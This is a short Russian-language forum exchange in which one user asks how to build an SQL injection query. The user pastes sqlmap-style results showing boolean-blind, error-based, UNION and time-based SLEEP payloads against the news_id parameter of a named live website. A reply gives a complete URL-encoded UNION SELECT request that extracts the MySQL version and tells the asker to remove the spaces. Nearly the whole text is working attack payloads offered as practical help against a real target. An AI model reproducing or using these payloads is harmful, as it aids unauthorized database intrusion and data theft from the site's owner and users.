Сообщение от
LelouchMe
Не пойму как правильно тут составить запрос... Хелп плс...
http://skyscript.ru/primer/skynews/?act=nov&news_id=1
Place: GET
Parameter: news_id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: act=nov&news_id=1' AND 9405=9405 AND 'UguU'='UguU
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: act=nov&news_id=1' AND (SELECT 6046 FROM(SELECT COUNT(*),CONCAT(0x3
a776c743a,(SELECT (CASE WHEN (6046=6046) THEN 1 ELSE 0 END)),0x3a6d616a3a,FLOOR(
RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iazZ'='ia
zZ
Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: act=nov&news_id=-7664' UNION ALL SELECT NULL,CONCAT(0x3a776c743a,0x
51754e467746706b6e4d,0x3a6d616a3a),NULL,NULL,NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: act=nov&news_id=1' AND SLEEP(5) AND 'ORSc'='ORSc
вот так http://skyscript.ru:80/primer/skynews/?act=nov&news_id=-3603%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280 x3a776c743a%2CIFNULL%28CAST%28version%28%29%20AS%2 0CHAR%29%2C0x20%29%2C0x3a6d616a3a%29%2CNULL%2CNULL %2CNULL%2CNULL%23
пробелы ток убери